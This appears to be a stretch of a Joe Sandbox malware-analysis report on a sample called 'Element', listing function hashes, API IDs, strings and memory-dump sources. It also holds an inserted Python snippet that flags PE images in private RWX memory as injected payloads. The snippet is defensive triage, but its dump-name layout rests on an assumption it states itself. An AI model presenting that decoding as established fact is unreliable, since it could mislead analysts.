                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 3721556410-2107944366
                    • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                    • Instruction ID: ad6d8c18f9be1414b8d0a3c517d04d131ef432aaf6a65ce39dee4c643e4b6da7
                    • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                    • Instruction Fuzzy Hash: 8261CB76A14AA285EB40DF61EC945ED3770FB44F9AF400172ED8D97AA6CF38E949C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                    • String ID: 2$P
                    • API String ID: 93392585-1110268094
                    • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                    • Instruction ID: 91389447e9f203dc5ab3a304b29041dcec536fde1503d5f1adcb00a356bd16ed
                    • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                    • Instruction Fuzzy Hash: 58510136E0666289F7248F219C482BD37B5EB42F5AF244035CAAE97695CFBCD842C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProc
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3013587201-537541572
                    • Opcode ID: 25172eaa31ba3ca038662f7f5cf4ede4da3b633a465d710dd9bb12d489b4e0f4
                    • Instruction ID: 4a317c5059dbba4fcb51eb319c55abfc874e79225dc5c10c792080185a4c4d16
                    • Opcode Fuzzy Hash: 25172eaa31ba3ca038662f7f5cf4ede4da3b633a465d710dd9bb12d489b4e0f4
                    • Instruction Fuzzy Hash: 1F41D275311A00A1FB26DF16A8387E623D5FB68BA1F4841259D199B794FF38C4C7C300
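                    The function records above come from two different dump sources: the module image at 00007FF6C5870000 and a second "based on PE: true" region at 0000021925C50000 whose name carries different protection and type fields. The following Python is an added example (not Joe Sandbox code) that decodes those fields so an analyst can sort the listed functions by where they live. It assumes the .sdmp name layout is pid.run.seq.base.protect.flags.type.index, inferred from the names on this page; the numeric constants are the documented Win32 MEMORY_BASIC_INFORMATION values (PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40, MEM_PRIVATE = 0x20000, MEM_IMAGE = 0x1000000). Under that assumption the second region decodes to a PE inside private read-write-execute memory, which is what an unpacked or injected payload looks like; the sample lines are copied from the two "Source File" entries in this listing.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Win32 memory constants (MEMORY_BASIC_INFORMATION.Protect / .Type)
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# ASSUMPTION: the dump name layout is
#   <pid>.<run>.<seq>.<base>.<protect>.<flags>.<type>.<index>.sdmp
# with every field except <seq> in hex. Inferred from the report lines,
# not taken from any Joe Sandbox documentation.
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<flags>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<index>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    run: int
    region_base: int   # start of the dumped range
    module_base: int   # "Offset:" field, i.e. the PE base the dump is rebased on
    protect: int
    mem_type: int
    based_on_pe: bool

    @property
    def executable(self) -> bool:
        return bool(self.protect & (PAGE_EXECUTE | PAGE_EXECUTE_READ
                                    | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))

    @property
    def writable_executable(self) -> bool:
        return bool(self.protect & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))

    @property
    def file_backed_image(self) -> bool:
        return self.mem_type == MEM_IMAGE

    def verdict(self) -> str:
        if self.based_on_pe and not self.file_backed_image:
            kind = "private" if self.mem_type == MEM_PRIVATE else "mapped"
            rwx = " RWX" if self.writable_executable else ""
            return f"PE in {kind}{rwx} memory (manually mapped / injected / unpacked)"
        if self.writable_executable:
            return "writable+executable region"
        return "file-backed image" if self.file_backed_image else "non-image region"


def parse_source_line(line: str) -> DumpRegion:
    """Decode one 'Source File: ... Offset: ... based on PE: ...' line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Memory Dump Source line: {line!r}")
    f = SDMP_RE.fullmatch(m["name"])
    if not f:
        raise ValueError(f"unexpected sdmp name: {m['name']!r}")
    return DumpRegion(
        name=m["name"],
        pid=int(f["pid"], 16),
        run=int(f["run"], 16),
        region_base=int(f["base"], 16),
        module_base=int(m["offset"], 16),
        protect=int(f["protect"], 16),
        mem_type=int(f["type"], 16),
        based_on_pe=m["pe"].lower() == "true",
    )


def suspicious_regions(lines: Iterable[str]) -> List[DumpRegion]:
    """Distinct dump regions holding a PE outside any file-backed image."""
    seen = {}
    for line in lines:
        if "Source File:" not in line:
            continue
        r = parse_source_line(line)
        if r.based_on_pe and not r.file_backed_image:
            seen.setdefault(r.module_base, r)
    return sorted(seen.values(), key=lambda r: r.module_base)


# Constructed sample: the two distinct "Source File" lines of this listing plus
# one unrelated line, to show the filter skipping what it does not understand.
SAMPLE_LINES = [
    "Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true",
    "Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd",
    "Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        if "Source File:" in line:
            r = parse_source_line(line)
            print(f"pid {r.pid} base {r.module_base:#x}: {r.verdict()}")
```

Running the block on the sample prints one "file-backed image" line for 0x7ff6c5870000 and one "PE in private RWX memory" line for 0x21925c50000; the functions listed under the second source (the api-ms-/ext-ms- resolver and the undname-style Name::operator+ routines) are therefore the ones worth pulling from the private dump rather than from the on-disk sample.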
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: IconLoad_invalid_parameter_noinfo
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 4060274358-404129466
                    • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                    • Instruction ID: 62c99a4cf4939a9723efd540ca5cd60a77f077516e62e97138503d0a413a13be
                    • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                    • Instruction Fuzzy Hash: A0216029B0E79381FB549F16AD0017A62A1AF84F8BF444031DD8D867E6EFBCEC408680
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Messagewprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 4051287042-3128320259
                    • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                    • Instruction ID: 59138784724c96a2e408d23fdfc36ece7f92215a4988444b0b8ffd9d0d3ef355
                    • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                    • Instruction Fuzzy Hash: 28113075A19BC191D7348F10FC45BEA2260FB48B45F84143AD68E86A5ADF7CC945C740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                    • Instruction ID: 5749327d748cde6fdc97bea928c8bbfedbf271fb24d96f7ba05d1f749262ecb8
                    • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                    • Instruction Fuzzy Hash: 55A10272B186C342EB688F259D4873977A0FB44F86F105075DA8A87AA2DF3CEC64C741
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                    • Instruction ID: f0837dcedb0ee1270ed3144aba450a54ea63de30ece828ff8d75a3479cf91616
                    • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                    • Instruction Fuzzy Hash: CE518131A0E29389F7659F399C5877D2695BF86F4BF284075C58EC62E6CE2CAC84D200
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                    • Instruction ID: 81e1935ec004b584cb7ebbef2a21ec777712fc8932464183b5b7c0e3a1b1dff0
                    • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                    • Instruction Fuzzy Hash: C9418C326186D187E764CF22A854B6BBBA4F788B92F144135EFCA87B55DF3CD8448B00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: f$p$p
                    • API String ID: 3215553584-1995029353
                    • Opcode ID: 9fe477bd0c5a7b01680382f126af39dde9fe20cbd0db8a811c9d028545c0385f
                    • Instruction ID: 35bd8e3e524bc7eab3183231a4608edd526755d58674c1caa61aac8bc068cca8
                    • Opcode Fuzzy Hash: 9fe477bd0c5a7b01680382f126af39dde9fe20cbd0db8a811c9d028545c0385f
                    • Instruction Fuzzy Hash: A712C372609281A6FB24BB14E07D7FA76A2F3B0754F984016EE92476C4D778CCCACB14
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                    • Instruction ID: 9f096b830bd5be7f4fd60be1dbe9f46f41fb953d8ed8b16b5b5feffed7adea8e
                    • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                    • Instruction Fuzzy Hash: 45C1F662A0E6A2C5EA64AF159C5027E6B99FB80F82F550135DACE873D6CF3DEC418704
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-0
                    • Opcode ID: 94e99afacb6616a9b46cb6a5db9c8b19b6303e58a3e745d9002a33f1b15372e6
                    • Instruction ID: 553735a7b15417a65e72f255ae60dad6f5a6e0c60a9143f68fb5d56983928230
                    • Opcode Fuzzy Hash: 94e99afacb6616a9b46cb6a5db9c8b19b6303e58a3e745d9002a33f1b15372e6
                    • Instruction Fuzzy Hash: 9FC1D2B2204785A2FB619BA5D4783EE3BE0F7A1B90F550115EE8A03791DB78C8CBC740
                    APIs
                    • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F133B
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1391
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1478
                    • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F149F
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F14B0
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F151E
                    • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF6C58F0CA8,?,?,00000000,00007FF6C59086CF), ref: 00007FF6C58F1593
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                    • Instruction ID: 67143af04e1a1d1edabeec21af45ace7104ddb9b67a45bade2f3b76062361656
                    • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                    • Instruction Fuzzy Hash: 07A1BD22E0A66285FB149F65C8443BC27A2FB98F96F554231DE8ED7696DF3CE841C340
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                    • Instruction ID: 9ff4503b1278fc61e0ed7e30108655bca56cab57717856537b4611ca37c08f82
                    • Opcode Fuzzy Hash: d06d4cd1a423281fa7bfc3dd395589592d26c066c60ef58400709c52517d685a
                    • Instruction Fuzzy Hash: AFA19E72B186D087D7748F1AA80066EBB65FB85BD5F144125EACA57B69CF3CD842CF00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Enabled
                    • String ID:
                    • API String ID: 3694350264-0
                    • Opcode ID: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                    • Instruction ID: 3e6ca779b60336dedfb8f9f212b661f5ca22fe89c7bcb8a6bd52bf7bbf6823b3
                    • Opcode Fuzzy Hash: afb273491b6871b9358392d720659e4730aaef88e09809c522e030074b87f941
                    • Instruction Fuzzy Hash: E591AD61E0968686FBA49F169C587B97791AF44F92F4440B6CADD83693DF3CEC808340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: {for
                    • API String ID: 2943138195-864106941
                    • Opcode ID: a5fdb8b41746570ddb4a6c35813bd7a5a02f78c60ac1663242e01e009bc5989a
                    • Instruction ID: 097e67e469843788b52ec368620180bcf571d64a258c00e01621d1ad29a47548
                    • Opcode Fuzzy Hash: a5fdb8b41746570ddb4a6c35813bd7a5a02f78c60ac1663242e01e009bc5989a
                    • Instruction Fuzzy Hash: F1518A72600B84B9FB01DF64D4B83EC37A4E364788F848511DE4857B99DB78CADAC740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                    • String ID:
                    • API String ID: 161812096-0
                    • Opcode ID: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                    • Instruction ID: c71a5099d2d08c490d836aa91b34841b56cf457b03b5e54114b11c19572d3b4c
                    • Opcode Fuzzy Hash: 2e0c978de7f3949c5e4fef75b6087ee8ddd4ddcc90206a13e30e68fd27cedf73
                    • Instruction Fuzzy Hash: D1418A36A04B9185EB50CF22D8846AD33A6FB95F96F140072DE8D87766CF38E848C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+Replicator::operator[]
                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                    • API String ID: 1405650943-2211150622
                    • Opcode ID: 8624ffa6286a329bd631787d57d7c436c78feb80bbbfb7c630a3299e2e9fd710
                    • Instruction ID: 55b3af2c6fa1a9d812a1f98dd44bcbc3815c85085a282997977a9075f86f805a
                    • Opcode Fuzzy Hash: 8624ffa6286a329bd631787d57d7c436c78feb80bbbfb7c630a3299e2e9fd710
                    • Instruction Fuzzy Hash: 12413D72A00B44B8F711AB68D8B83ED37E4B328308F588515CE4857768DF7886C6CB51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID: char $int $long $short $unsigned
                    • API String ID: 2943138195-3894466517
                    • Opcode ID: 5c74198424c0575449acf1c04fcf47b84933b6485333105e5f7cacb712aad59b
                    • Instruction ID: ccfb9620116ae19919eea91da3c4d2deb595055cf32e3bbba98e20279254b254
                    • Opcode Fuzzy Hash: 5c74198424c0575449acf1c04fcf47b84933b6485333105e5f7cacb712aad59b
                    • Instruction Fuzzy Hash: 60317E72A10A50B8F716EF78D8783DC37B1B328788F448115EE0947BA8DB38D586CB51
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                    • Instruction ID: 9a474fce85034183310e994f646238662d678dea0c773ae47d0a84360f9b749a
                    • Opcode Fuzzy Hash: 769d822a731d8b4ab9969762f95a8256fd4e8cf9c5dd72bf7c6db143b8f84875
                    • Instruction Fuzzy Hash: C9313936A0869187E3708F25F894B1AB761EB88B91F109279DB9943F5ACF3CD8458B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
